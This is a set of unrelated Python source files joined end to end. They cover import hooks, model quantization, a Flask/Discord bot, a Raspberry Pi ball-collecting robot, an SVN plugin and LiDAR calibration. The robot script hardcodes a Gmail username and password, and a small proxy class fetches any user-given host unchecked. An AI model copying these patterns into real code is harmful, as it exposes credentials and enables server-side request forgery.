Based on Demo/imputil/importers.py file distributed with Python 2.x.
"""
import imp
from . import imputil
import marshal
import os
import struct
import sys
from types import CodeType
# byte-compiled file suffix character
_suffix_char = __debug__ and 'c' or 'o'
# byte-compiled file suffix
_suffix = '.py' + _suffix_char
# the C_EXTENSION suffixes
_c_suffixes = filter(lambda x: x[2] == imp.C_EXTENSION, imp.get_suffixes())
def _timestamp(pathname):
"Return the file modification time as a Long."
try:
s = os.stat(pathname)
except OSError:
return None
return long(s[8])
def _compile(path):
"Read and compile Python source code from file."
f = open(path)
c = f.read()
f.close()
return compile(c, path, 'exec')
def _fs_import(dir, modname, fqname):
"Fetch a module from the filesystem."
pathname = os.path.join(dir, modname)
if os.path.isdir(pathname):
values = { '__pkgdir__' : pathname, '__path__' : [ pathname ] }
ispkg = 1
pathname = os.path.join(pathname, '__init__')
else:
values = { }
ispkg = 0
# look for dynload modules
for desc in _c_suffixes:
file = pathname + desc[0]
try:
fp = open(file, desc[1])
except IOError:
pass
else:
module = imp.load_module(fqname, fp, file, desc)
values['__file__'] = file
return 0, module, values
t_py = _timestamp(pathname + '.py')
t_pyc = _timestamp(pathname + _suffix)
if t_py is None and t_pyc is None:
return None
code = None
if t_py is None or (t_pyc is not None and t_pyc >= t_py):
file = pathname + _suffix
f = open(file, 'rb')
if f.read(4) == imp.get_magic():
t = struct.unpack('<I', f.read(4))[0]
if t == t_py:
code = marshal.load(f)
f.close()
if code is None:
file = pathname + '.py'
code = _compile(file)
values['__file__'] = file
return ispkg, code, values
class PathImporter(imputil.Importer):
def __init__(self, path, callback):
self.path = path
self.callback = callback
def rewrite(self, retvals):
if isinstance(retvals, tuple) and type(retvals[1]) == CodeType:
return (retvals[0], self.callback(retvals[1]), retvals[2])
return retvals
def get_code(self, parent, modname, fqname):
if parent:
# we are looking for a module inside of a specific package
return self.rewrite(_fs_import(parent.__pkgdir__, modname, fqname))
# scan sys.path, looking for the requested module
for dir in self.path:
if isinstance(dir, str):
result = _fs_import(dir, modname, fqname)
if result:
return self.rewrite(result)
# not found
return None
class ImportManager(imputil.ImportManager):
def _import_hook(self, fqname, globals=None, locals=None, fromlist=None, level=-1):
# TODO: support level argument added in Python 2.5
return imputil.ImportManager._import_hook(self, fqname, globals, locals, fromlist)
import_manager = ImportManager()
def install(callback):
"Install callback as a code-rewriting function for each imported module."
import_manager.install()
sys.path.insert(0, PathImporter(sys.path, callback))
sys.path.insert(0, imputil.BuiltinImporter())
def uninstall():
import_manager.uninstall()
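# Illustrative usage (hypothetical callback; not part of the original module):
# the callback receives each imported module's code object and must return a
# (possibly rewritten) code object.
#
#   def passthrough(code):
#       return code
#
#   install(passthrough)   # modules imported after this point pass through the callback
#   uninstall()            # restore the default import machinery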
|
# Copyright 2021 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import copy
from model_compression_toolkit import common
from model_compression_toolkit.common import Logger
from model_compression_toolkit.common.framework_implementation import FrameworkImplementation
from model_compression_toolkit.common.graph.base_node import BaseNode
from model_compression_toolkit.common.framework_info import FrameworkInfo
from model_compression_toolkit.common.quantization.node_quantization_config import NodeWeightsQuantizationConfig
from model_compression_toolkit.common.quantization.quantization_params_generation.qparams_weights_computation import \
get_channels_axis
def get_quantized_kernel_by_weights_qc(fw_info:FrameworkInfo,
n:BaseNode,
weights_qc: NodeWeightsQuantizationConfig,
fw_impl: FrameworkImplementation):
"""
For a node and a weights quantization configuration, compute
the quantized kernel of the node and return it and the input/output channels indices.
Args:
        fw_info: A FrameworkInfo object with information needed for quantization about the specific framework (e.g., kernel channels indices, groups of layers by how they should be quantized, etc.).
n: Node to quantize its kernel.
weights_qc: Weight quantization configuration to use for the quantization.
fw_impl: FrameworkImplementation with specific framework implementations.
Returns:
A quantized kernel of the node using a weights quantization configuration.
"""
# If weights should be quantized per-channel but a kernel channels mapping is missing.
if weights_qc.weights_per_channel_threshold and fw_info.kernel_channels_mapping is \
None:
common.Logger.warning(
'Weights Per Channel Quantization requires channel mapping function but framework info '
'does not contain one')
output_channels_axis, input_channels_axis = get_channels_axis(weights_qc,
fw_info,
n.type)
Logger.debug(f'quantizing {n.name} with {weights_qc.weights_n_bits} bits')
quantized_kernel = weights_qc.weights_quantization_fn(n.get_weights_by_keys(fw_impl.constants.KERNEL),
n_bits=weights_qc.weights_n_bits,
signed=True,
quantization_params=weights_qc.weights_quantization_params,
per_channel=weights_qc.weights_per_channel_threshold,
output_channels_axis=output_channels_axis)
return quantized_kernel, (input_channels_axis, output_channels_axis)
|
#!/usr/bin/env python3
# encoding:utf-8
import os
import cv2
from CalibrationConfig import *
# Collect calibration images and save them in calib folder
# Press the Space key on the keyboard to store the image, and press ESC to exit
cap = cv2.VideoCapture(-1)
# If the calib folder does not exist, create a new one
if not os.path.exists(save_path):
os.mkdir(save_path)
# Count the number of images stored
num = 0
while True:
ret, frame = cap.read()
if ret:
Frame = frame.copy()
cv2.putText(Frame, str(num), (10, 50), cv2.FONT_HERSHEY_COMPLEX, 2.0, (0, 0, 255), 5)
cv2.imshow("Frame", Frame)
key = cv2.waitKey(1)
if key == 27:
break
if key == 32:
num += 1
# Image name format:current number of images.jpg
cv2.imwrite(save_path + str(num) + ".jpg", frame)
cap.release()
cv2.destroyAllWindows()
|
"""
TAC Conformance Server
DASH-IF Implementation Guidelines: Token-based
Access Control for DASH (TAC)
"""
import requests
class Proxy(object):
"""
Handles /proxy/{url}.
"""
def on_get(self, req, resp):
"""
GET /proxy/{url}
"""
response = requests.get('https://{}'.format(
req.path.replace('/proxy/', '')))
resp.content_type = response.headers['Content-Type']
resp.body = response.content
|
'''
Series - 3
'''
def printRangeOdd(n):
start = int('1' + '0' * n) - 1
if (n == 1):
end = 0
else:
end = int('9' + '9' * (n - 2))
for i in range(start, end, -2):
print(i, end=' ')
print('')
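# For example, printRangeOdd(2) prints the two-digit odd numbers in descending
# order: 99 97 95 ... 11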
n = int(input())
printRangeOdd(n)
|
from flask import Flask, request, session, g, url_for, redirect, abort
import database
import bot
import _thread as thread
app = Flask(__name__)
with open('src/secrets/flask_key.txt') as flask_key_file:
app.secret_key = bytes(flask_key_file.readline(), "utf-8").decode("unicode_escape")
thread.start_new_thread(bot.init_bot, tuple())
@app.route('/')
def index():
return 'Placeholder text'
PAIR_ID = 'id'
DISCORD_ID = 'discord_id'
DISCORD_NAME = 'discord_name'
@app.route('/pair', methods=['POST'])
def handle_pair():
pair_id = request.form[PAIR_ID]
user_id = database.get_user_id_from_pair_id(pair_id)
    if user_id is not None:
        database.delete_pair_id(pair_id)
        user_data = database.get_user_data(user_id)
        session[DISCORD_ID] = user_id
        session[DISCORD_NAME] = user_data.user_name
        # a view must return a response; send the paired user back to the index page
        return redirect(url_for('index'))
    else:
        abort(401, description="Invalid or expired pair code")
@app.route('/logout', methods=['POST'])
def handle_logout():
session.pop(DISCORD_NAME, None)
session.pop(DISCORD_ID, None)
return redirect(url_for('index'))
@app.route('/data', methods=['POST'])
def handle_data():
    # form values arrive as strings; compare speeds numerically
    speed = float(request.form['speed'])
    user_id = session[DISCORD_ID]
    user_data = database.get_user_data(user_id)
    if user_data:
        min_speed = user_data.min_speed
        if not min_speed:
            min_speed = 0
            database.store_settings_data(user_id, min_speed=0)
        if speed < float(min_speed):
            bot.client.punish(user_data)
    return ('', 204)
@app.route('/settings', methods=['GET', 'POST'])
def handle_settings():
    method = request.method
    if method == 'GET':
        pass
    elif method == 'POST':
        min_speed = request.form['min_speed']
        # pass the logged-in user's id, matching the store_settings_data call above
        database.store_settings_data(session[DISCORD_ID], min_speed=min_speed)
    return redirect(url_for('index'))
|
# Generated by Django 3.0.14 on 2021-08-18 12:43
from django.db import migrations
from bpp.migration_util import load_custom_sql
class Migration(migrations.Migration):
dependencies = [
("bpp", "0287_trgrm_extnsn"),
]
operations = [
migrations.RunPython(
lambda *args, **kw: load_custom_sql("0288_rekord_mat_isbn", app_name="bpp"),
),
        # Rebuilding the rekord_mat table will drop bpp_uczelnia_ewaluacja_view,
        # so that view's file needs to be pulled in again from an earlier migration:
migrations.RunPython(
lambda *args, **kw: load_custom_sql("0207_uczelnia_analiza_view")
),
]
|
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import cv2
import zipfile
from io import StringIO
from PIL import Image
from skimage import img_as_float, img_as_ubyte
# Ignore warnings
import warnings
from data_loaders import *
import os
import os.path
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class ConcatDataset(Dataset):
"""Concat Demosaic dataset."""
def __init__(self, root_dir, transform=None, pattern='bayer_rggb',
apply_bilinear=False, selection_pattern='', dataset='',num_files=None):
"""
Args:
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
            selection_pattern (string): one of 'train', 'test' or 'val'
"""
if selection_pattern not in ['train', 'test', 'val']:
raise AssertionError
self.root_dir = root_dir
self.transform = transform
self.selection_pattern = selection_pattern
directory = self.root_dir + selection_pattern + '/'
filelist_ = []
for dirpath, dirnames, filenames in os.walk(directory):
for filename in [f for f in filenames if f.endswith(".png")]:
filelist_.append(os.path.join(dirpath, filename))
self.listfiles_gt = filelist_
        # keep only the files belonging to the requested dataset
if dataset == 'vdp' or dataset == 'moire':
self.listfiles_gt = [f for f in filelist_ if dataset in f]
self.listfiles_gt.sort()
if selection_pattern == 'train' and num_files is not None:
import random
self.listfiles_gt = random.sample(self.listfiles_gt, num_files)
print(len(self.listfiles_gt))
self.mask = None
self.pattern = pattern
self.apply_bilinear = apply_bilinear
def __len__(self):
return len(self.listfiles_gt)
def compute_mask(self, pattern, im_shape):
"""
        Function compute_mask creates a mask according to the given pattern. The purpose
        of the mask is to expand a 2D mosaic image into a 3-channel RGB image.
"""
# code from https://github.com/VLOGroup/joint-demosaicing-denoising-sem
if pattern == 'bayer_rggb':
r_mask = np.zeros(im_shape)
r_mask[0::2, 0::2] = 1
g_mask = np.zeros(im_shape)
g_mask[::2, 1::2] = 1
g_mask[1::2, ::2] = 1
b_mask = np.zeros(im_shape)
b_mask[1::2, 1::2] = 1
mask = np.zeros(im_shape +(3,))
mask[:, :, 0] = r_mask
mask[:, :, 1] = g_mask
mask[:, :, 2] = b_mask
elif pattern == 'xtrans':
g_mask = np.zeros((6,6))
g_mask[0,0] = 1
g_mask[0,2] = 1
g_mask[0,3] = 1
g_mask[0,5] = 1
g_mask[1,1] = 1
g_mask[1,4] = 1
g_mask[2,0] = 1
g_mask[2,2] = 1
g_mask[2,3] = 1
g_mask[2,5] = 1
g_mask[3,0] = 1
g_mask[3,2] = 1
g_mask[3,3] = 1
g_mask[3,5] = 1
g_mask[4,1] = 1
g_mask[4,4] = 1
g_mask[5,0] = 1
g_mask[5,2] = 1
g_mask[5,3] = 1
g_mask[5,5] = 1
r_mask = np.zeros((6,6))
r_mask[0,4] = 1
r_mask[1,0] = 1
r_mask[1,2] = 1
r_mask[2,4] = 1
r_mask[3,1] = 1
r_mask[4,3] = 1
r_mask[4,5] = 1
r_mask[5,1] = 1
b_mask = np.zeros((6,6))
b_mask[0,1] = 1
b_mask[1,3] = 1
b_mask[1,5] = 1
b_mask[2,1] = 1
b_mask[3,4] = 1
b_mask[4,0] = 1
b_mask[4,2] = 1
b_mask[5,4] = 1
mask = np.dstack((r_mask,g_mask,b_mask))
h, w = im_shape
nh = np.ceil(h*1.0/6)
nw = np.ceil(w*1.0/6)
mask = np.tile(mask,(int(nh), int(nw),1))
mask = mask[:h, :w,:]
else:
raise NotImplementedError('Only bayer_rggb is implemented')
return mask
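    # Illustrative: for a 4x4 image with pattern 'bayer_rggb', the red channel of the
    # returned mask is [[1,0,1,0],[0,0,0,0],[1,0,1,0],[0,0,0,0]]; the green and blue
    # channels cover the remaining Bayer positions.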
def preprocess(self, pattern, img):
"""
bilinear interpolation for bayer_rggb images
"""
# code from https://github.com/VLOGroup/joint-demosaicing-denoising-sem
if pattern == 'bayer_rggb':
convertedImage = cv2.cvtColor(img, cv2.COLOR_BAYER_BG2RGB_EA)
return convertedImage
else:
raise NotImplementedError('Preprocessing is implemented only for bayer_rggb')
def __getitem__(self, idx):
img_name_gt = self.listfiles_gt[idx]
try:
image_gt = cv2.imread(img_name_gt)
b, g, r = cv2.split(image_gt) # get b,g,r
image_gt = cv2.merge([r, g, b]) # switch it to rgb
except Exception as e:
print(e, img_name_gt)
image_gt = cv2.imread(self.listfiles_gt[0])
b, g, r = cv2.split(image_gt) # get b,g,r
image_gt = cv2.merge([r, g, b]) # switch it to rgb
#image_gt = image_gt / 255
#mask = image_gt >= 0.04045
#image_gt[mask] = ((image_gt[mask] + 0.055) / 1.055)**2.4
#image_gt[~mask] = image_gt[~mask] / 12.92
#image_gt = image_gt.clip(0,1)
#image_gt *= 255
#image_gt = image_gt.astype(np.uint8)
# perform mask computation based on size
mask = self.compute_mask(self.pattern, image_gt.shape[:2])
mask = mask.astype(np.uint8)
image_mosaic = np.zeros_like(image_gt)
image_mosaic = mask * image_gt
image_input = np.sum(image_mosaic, axis=2, dtype='uint8')
# perform bilinear interpolation for bayer_rggb images
if self.apply_bilinear:
image_mosaic = self.preprocess(self.pattern, image_input)
image_gt = img_as_ubyte(image_gt)
image_input = img_as_ubyte(image_mosaic)
#assert image_gt.dtype == 'float64'
#assert image_input.dtype == 'float64'
sample = {'image_gt': image_gt,
'image_input': image_input,
'filename': self.listfiles_gt[idx],
'mask': mask}
if self.transform:
sample = self.transform(sample)
return sample
if __name__ == "__main__":
demosaic_dataset = VDPDataset(root_dir='data/mit-demosaicing/joined.zip',
selection_pattern='train',
apply_bilinear=True)
fig, axarr = plt.subplots(3, 4)
for i in range(len(demosaic_dataset)):
sample = demosaic_dataset[i]
ax = axarr[0, i]
ax.set_title('Sample groundtruth #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_gt'], interpolation="none")
ax = axarr[1, i]
ax.set_title('Sample input #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_input'], cmap='gray')
ax = axarr[2, i]
ax.set_title('Sample mosaic #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_mosaic'], interpolation="none")
if i == 3:
# Fine-tune figure; make subplots farther from each other.
plt.show()
break
# plot some transformations for demonstration
composed = [RandomCrop(100), [Identity(), RandomRotation(), Onepixelshift(x=0, y=10)],
ToTensor()]
demosaic_dataset_ = ConcatDataset(root_dir='data/mit-demosaicing/joined.zip',
selection_pattern='train',
transform=composed,
apply_bilinear=True)
dataloader_val = DataLoader(demosaic_dataset_, batch_size=20,
shuffle=False, num_workers=4)
# Apply each of the above transforms on sample.
fig, axarr = plt.subplots(3, 5)
for i in range(len(demosaic_dataset_)):
sample = demosaic_dataset_[i]
ax = axarr[0, i]
ax.imshow(swapimdims_3HW_HW3(sample['image_gt']))
ax = axarr[1, i]
ax.imshow(sample['image_input'], cmap='gray')
ax = axarr[2, i]
ax.imshow(swapimdims_3HW_HW3(sample['image_mosaic']))
        if i == 4:
plt.show()
break
|
#!/usr/bin/env python3
'''This NetworkTables client listens for changes in NetworkTables values.'''
import time
from networktables import NetworkTables
import logging
# To see messages from networktables, you must setup logging
logging.basicConfig(level=logging.DEBUG)
def valueChanged(table, key, value, isNew):
print("{}; key: {}; value: {}; isNew: {}".format(table, key, value, isNew))
NetworkTables.initialize(server='192.168.1.21')
sd = NetworkTables.getTable("SmartDashboard")
sd.addEntryListener(valueChanged)
while True:
time.sleep(1)
|
import numpy as np
import cv2 # OpenCV-Python
import matplotlib.pyplot as plt
import imutils
import time
import RPi.GPIO as gpio
import os
from datetime import datetime
import smtplib
from smtplib import SMTP
from smtplib import SMTPException
import email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import serial
ser = serial.Serial('/dev/ttyUSB0',9600)
imu_data = []
#email
def email_Send():
pic_time = datetime.now().strftime('%Y%m%d%H%M%S')
# command = 'raspistill -w 1280 -h 720 -vf -hf -o ' + pic_time + '.jpg'
# os.system(command)
#EMAIL
smtpUser = 'enpm809tslamdunk@gmail.com'
smtpPass = 'pi@slamdunk'
#DESTINATION
toAdd = 'govindajithkumar97@gmail.com'
fromAdd = smtpUser
subject = 'IMAGE RECORDED FROM PI' + pic_time
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = fromAdd
msg['To'] = toAdd
    msg.preamble = "Image recorded at : " + pic_time
#EMAIL TEXT
body = MIMEText("Image recorded at : " + pic_time)
msg.attach(body)
fp = open('email_image_captured'+'.png','rb')
img = MIMEImage(fp.read())
fp.close()
msg.attach(img)
#send email
s = smtplib.SMTP('smtp.gmail.com',587)
s.ehlo()
s.starttls()
s.ehlo()
s.login(smtpUser,smtpPass)
s.sendmail(fromAdd, toAdd, msg.as_string())
s.quit()
print("Email DELIVERED!!!!!")
gpio.setmode(gpio.BOARD)
def init():
gpio.setup(31,gpio.OUT) #IN1
gpio.setup(33,gpio.OUT) #IN2
gpio.setup(35,gpio.OUT) #IN3
gpio.setup(37,gpio.OUT) #IN4
def gameover():
gpio.output(31,False)
gpio.output(33,False)
gpio.output(35,False)
gpio.output(37,False)
init()
pin1 = 33
pin2 = 37
pwm1 = gpio.PWM(pin1,50)
pwm2 = gpio.PWM(pin2,50)
pin3 = 31
pin4 = 35
pwm3 = gpio.PWM(pin3,50)
pwm4 = gpio.PWM(pin4,50)
val = 60
val_f = 70
#servo
gpio.setup(36,gpio.OUT)
pwm = gpio.PWM(36,50)
#####
def forward(val_f):
pwm3.start(val_f)
pwm2.start(val_f)
time.sleep(0.1)
def reverse(val_f):
pwm1.start(val_f)
pwm4.start(val_f)
time.sleep(0.1)
def left(val):
pwm1.start(val)
pwm2.start(val)
time.sleep(0.1)
def right(val):
pwm3.start(val)
pwm4.start(val)
time.sleep(0.1)
def stop():
pwm1.stop()
pwm2.stop()
pwm3.stop()
pwm4.stop()
time.sleep(0.1)
pwm.start(8.3)
def servo_open():
time.sleep(0.1)
i = 0
for i in range(5):
pwm.ChangeDutyCycle(12.0)
time.sleep(0.1)
# pwm.stop()
def servo_close():
# pwm.start(8.3)
time.sleep(0.1)
i = 0
for i in range(5):
pwm.ChangeDutyCycle(6.5)
time.sleep(1)
# pwm.stop()
trig = 16
echo = 18
def Ultrasonic_distance():
gpio.setmode(gpio.BOARD)
gpio.setup(trig,gpio.OUT)
gpio.setup(echo,gpio.IN)
#ensure that the output has no value
gpio.output(trig,False)
time.sleep(0.010)
#generate the trigger pulse
gpio.output(trig,True)
time.sleep(0.00001) #this is 10 microseconds
gpio.output(trig,False)
all_distance=[]
#generating the return / echo signals
try:
while gpio.input(echo)==0:
pulse_start=time.time()
while gpio.input(echo) == 1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
#convert time to distance
distance = pulse_duration*17150
distance = round(distance,2)
except:
        distance = 999 #arbitrary high value > 9, because of the ultrasonic threshold mentioned below.
return(distance)
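# Worked example of the conversion above (illustration only): a 1 ms echo pulse
# gives 0.001 * 17150 = 17.15 cm. The 17150 factor is the speed of sound
# (~34300 cm/s) halved to account for the round trip to the object and back.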
cam= cv2.VideoCapture(0)
count=0
def calc_dist(pt1):
pt2 = (320,240)
dist = 320-pt1[0]
return dist
def draw(orig_image):
cv2.line(orig_image,(320,0),(320,480),(255,255,255),1)
cv2.line(orig_image,(0,240),(640,240),(255,255,255),1)
cv2.circle(orig_image,(centre_x,centre_y),100,(0,255,0),2)
cv2.circle(orig_image,(centre_x,centre_y),4,(255,255,255),-1)
flag = False #for opening
flag2 = False # for closing
while True:
line = ser.readline()
line = line.rstrip().lstrip()
line = str(line)
line = line.strip("'")
line = line.strip("b'")
imu_data.append(line)
print("imu=",line)
dist_US = Ultrasonic_distance()
if dist_US>9 and flag == False:
print('SERVO OPENING')
servo_open()
time.sleep(0.8)
flag = True
flag2 = False
ret, image=cam.read()
image = cv2.flip(image,-1)
orig_image = image
hsv_img = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)
lower_range = np.array([0,105,175])
upper_range = np.array([180,255,255])
mask = cv2.inRange(hsv_img, lower_range, upper_range)
edged = cv2.Canny(mask, 30, 200)
try:
        # OpenCV 3.x findContours returns (image, contours, hierarchy); OpenCV 4.x returns (contours, hierarchy)
        _, contours, _ = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours_poly = [None]*len(contours)
centers = [None]*len(contours)
radius = [None]*len(contours)
cx= []
cy = []
for i, c in enumerate(contours):
contours_poly[i] = cv2.approxPolyDP(c, 3, True)
centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])
cx.append(centers[i][0])
cy.append(centers[i][1])
centre_x= int((min(cx)+max(cx))/2)
centre_y = int((min(cy)+max(cy))/2)
dist_2 = calc_dist((centre_x,centre_y))
print('------- horizontal distance ------ ' , dist_2)
cv2.putText(orig_image,'Ultrasonic : '+str(dist_US),(10,440),cv2.FONT_HERSHEY_COMPLEX,1,(255,0,255),2,cv2.LINE_AA)
draw(orig_image)
cv2.putText(orig_image,'Centre point offset : ' + str(dist_2),(10,410),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if(dist_2<-50):
print(' turning right ONLY')
right(val)
elif(dist_2>50):
print(' turning left ONLY')
left(val)
elif(-50<=dist_2<=50):
dist_US = Ultrasonic_distance()
print( ' dist_US WHILE MOVING STRAIGHT >>>>>>>> ' , dist_US)
if dist_US>9:
forward(val_f)
stop()
        if dist_US <= 9 and flag2 == False:
print('SERVO CLOSING')
cv2.putText(orig_image,'Email sent regarding object pickup to Dr. M',(10,30),cv2.FONT_HERSHEY_COMPLEX,0.6,(255,255,255),2,cv2.LINE_AA)
cv2.imwrite ('email_image_captured.png',orig_image)
print('writing image ' )
#time.sleep(0.5)
email_Send()
servo_close()
time.sleep(1.5)
# time.sleep(3)
print('CLOSING COMPLETE')
flag2 = True
print('reversing now')
reverse(val_f)
time.sleep(3.5)
stop()
print('servo opening again')
servo_open()
time.sleep(0.8)
reverse(val_f)
time.sleep(1)
left(val)
time.sleep(2)
forward(val_f)
time.sleep(1)
except:
stop()
        print('ERROR OCCURRED')
pass
cv2.imshow("contour image",orig_image)
# cv2.imshow("mask",mask)
cv2.imwrite (str(count+100)+'.png',orig_image)
# out.write(orig_image)
count+=1
k = cv2.waitKey(100) & 0xFF
if k == 27:
break
file = open('assignment_9_imu_values.txt','w')
for i in imu_data:
file.write(str(i))
file.write('\n')
file.close()
gameover()
gpio.cleanup()
cam.release()
# out.release()
cv2.destroyAllWindows()
|
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
# -------------------------------------------------------------------------
# svn.py - this code contains support for the old-and-busted Subversion
# version control system, for those that are not yet using git, which
# is the new hotness. It currently assumes repos are publicly accessible
# and because SVN doesn't really have "real" branches, ignores the
# branch parameter. Upgrades from users of SVN setups are quite welcome as
# are additions of other SCM types.
# --------------------------------------------------------------------------
import shlex
from vespene.common.logger import Logger
from vespene.workers import commands
LOG = Logger()
class Plugin(object):
def __init__(self):
pass
def setup(self, build):
self.build = build
self.project = build.project
self.repo = build.project.repo_url
def info_extract(self, attribute):
cmd = "(cd %s; svn info | grep \"%s\")" % (self.build.working_dir, attribute)
out = commands.execute_command(self.build, cmd, output_log=False, message_log=True)
if ":" in out:
return out.split(":")[-1].strip()
return None
def get_revision(self):
return self.info_extract("Last Changed Rev:")
def get_last_commit_user(self):
return self.info_extract("Last Changed Author:")
def checkout(self):
self.build.append_message("----------\nCloning repository...")
cmd = "svn checkout --non-interactive --quiet %s %s" % (shlex.quote(self.repo), self.build.working_dir)
return commands.execute_command(self.build, cmd, output_log=False, message_log=True)
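# Hedged usage sketch (not part of this module): inside a Vespene worker the
# plugin is driven by the build machinery, roughly along these lines, where
# `build` is assumed to be a Build model instance supplied by the worker:
#
#   plugin = Plugin()
#   plugin.setup(build)
#   plugin.checkout()
#   revision = plugin.get_revision()
#   author = plugin.get_last_commit_user()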
|
from .megadepth import MegaDepth_SIFT, MegaDepth_superpoint, MegaDepth_Depth
from .hpatches import HPatch_SIFT
from .aachen import Aachen_Day_Night
from .ETH_local_feature import ETH_LFB
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import rospy
import tf
import tf2_ros
import sensor_msgs.point_cloud2 as pc2
import pcl # https://github.com/strawlab/python-pcl/
import sys
import yaml
import os
from sensor_msgs.msg import PointCloud2
def translation_as_list(t):
return [t.x, t.y, t.z]
def quaternion_as_list(q):
return [q.x, q.y, q.z, q.w]
def transform_and_convert_to_pcl(pc2_cloud, transform):
trans = translation_as_list(transform.translation)
quat = quaternion_as_list(transform.rotation)
A = tf.transformations.translation_matrix(trans).dot(tf.transformations.quaternion_matrix(quat))
raw_points_list = [A.dot((p[0], p[1], p[2], 1.0))[:3] for p in pc2.read_points(pc2_cloud, field_names=("x", "y", "z"), skip_nans=True)]
points_list = [p for p in raw_points_list if (1 < p[2] < 4 and
2.5 < np.hypot(p[0], p[1]) < 20 and
np.abs(np.arctan2(p[1], p[0])) < np.pi/4)]
pcl_data = pcl.PointCloud()
pcl_data.from_list(points_list)
return pcl_data
def apply_delta_to_transform(D, transform):
trans = translation_as_list(transform.translation)
quat = quaternion_as_list(transform.rotation)
A = tf.transformations.translation_matrix(trans).dot(tf.transformations.quaternion_matrix(quat))
B = D.dot(A)
return (tf.transformations.translation_from_matrix(B),
tf.transformations.quaternion_from_matrix(B))
def plot_pcl(cloud, dims=(0,1), label=None):
plt.scatter([p[dims[0]] for p in cloud.to_list()],
[p[dims[1]] for p in cloud.to_list()],
s=.1, label=label)
class MultiVelodyneRegistration:
def __init__(self, output_filename):
rospy.init_node("multi_velodyne_registration", anonymous=True)
self.output_filename = output_filename
self.tfBuffer = tf2_ros.Buffer()
self.tfListener = tf2_ros.TransformListener(self.tfBuffer)
self.M_HDL32_PC2 = None
self.FL_VLP16_PC2 = None
self.FR_VLP16_PC2 = None
self.M_HDL32_tf0 = None
self.FL_VLP16_tf0 = None
self.FR_VLP16_tf0 = None
rospy.Subscriber("/M_HDL32/velodyne_points", PointCloud2, self.M_HDL32_cb, queue_size=1)
rospy.Subscriber("/FL_VLP16/velodyne_points", PointCloud2, self.FL_VLP16_cb, queue_size=1)
rospy.Subscriber("/FR_VLP16/velodyne_points", PointCloud2, self.FR_VLP16_cb, queue_size=1)
def M_HDL32_cb(self, msg):
if self.M_HDL32_PC2 is None:
self.M_HDL32_PC2 = msg
def FL_VLP16_cb(self, msg):
if self.FL_VLP16_PC2 is None:
self.FL_VLP16_PC2 = msg
def FR_VLP16_cb(self, msg):
if self.FR_VLP16_PC2 is None:
self.FR_VLP16_PC2 = msg
def run(self):
rate = rospy.Rate(10)
while (self.M_HDL32_PC2 is None or self.FL_VLP16_PC2 is None or self.FR_VLP16_PC2 is None or
self.M_HDL32_tf0 is None or self.FL_VLP16_tf0 is None or self.FR_VLP16_tf0 is None):
try:
self.M_HDL32_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"M_velodyne",
rospy.Time(0))
self.FL_VLP16_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"FL_velodyne_rough",
rospy.Time(0))
self.FR_VLP16_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"FR_velodyne_rough",
rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
pass
rate.sleep()
M_HDL32_PCL = transform_and_convert_to_pcl(self.M_HDL32_PC2,
self.M_HDL32_tf0.transform)
# [0.000, 0.000, 1.470],
# [0.000, 0.000, -0.707, 0.707])
FL_VLP16_PCL = transform_and_convert_to_pcl(self.FL_VLP16_PC2,
self.FL_VLP16_tf0.transform)
# [2.130, 1.020, 0.660],
# [0.000, 0.000, 0.000, 1.000])
FR_VLP16_PCL = transform_and_convert_to_pcl(self.FR_VLP16_PC2,
self.FR_VLP16_tf0.transform)
# [2.130, -1.020, 0.660],
# [0.000, 0.000, 0.000, 1.000])
ICP = pcl.IterativeClosestPoint()
FL_conv, FL_delta_transform, FL_aligned, FL_fitness = ICP.icp(FL_VLP16_PCL,
M_HDL32_PCL)
ICP = pcl.IterativeClosestPoint()
FR_conv, FR_delta_transform, FR_aligned, FR_fitness = ICP.icp(FR_VLP16_PCL,
M_HDL32_PCL)
FL_VLP16_tf = apply_delta_to_transform(FL_delta_transform, self.FL_VLP16_tf0.transform)
FR_VLP16_tf = apply_delta_to_transform(FR_delta_transform, self.FR_VLP16_tf0.transform)
FL_VLP16_args = (" ".join(map(str, FL_VLP16_tf[0])) + " " +
" ".join(map(str, FL_VLP16_tf[1])) + " " +
"vehicle_base FL_velodyne 100")
FR_VLP16_args = (" ".join(map(str, FR_VLP16_tf[0])) + " " +
" ".join(map(str, FR_VLP16_tf[1])) + " " +
"vehicle_base FR_velodyne 100")
calibration_dict = dict(FL_VLP16_args=FL_VLP16_args, FR_VLP16_args=FR_VLP16_args)
with open(self.output_filename, 'w') as f:
yaml.dump(calibration_dict, f)
plt.figure()
plot_pcl(M_HDL32_PCL, label="M_HDL32")
plot_pcl(FL_VLP16_PCL, label="FL_VLP16")
plot_pcl(FR_VLP16_PCL, label="FR_VLP16")
plt.title("uncalibrated")
plt.axis("equal")
leg = plt.legend()
leg.legendHandles[0]._sizes = [30]
leg.legendHandles[1]._sizes = [30]
leg.legendHandles[2]._sizes = [30]
mng = plt.get_current_fig_manager()
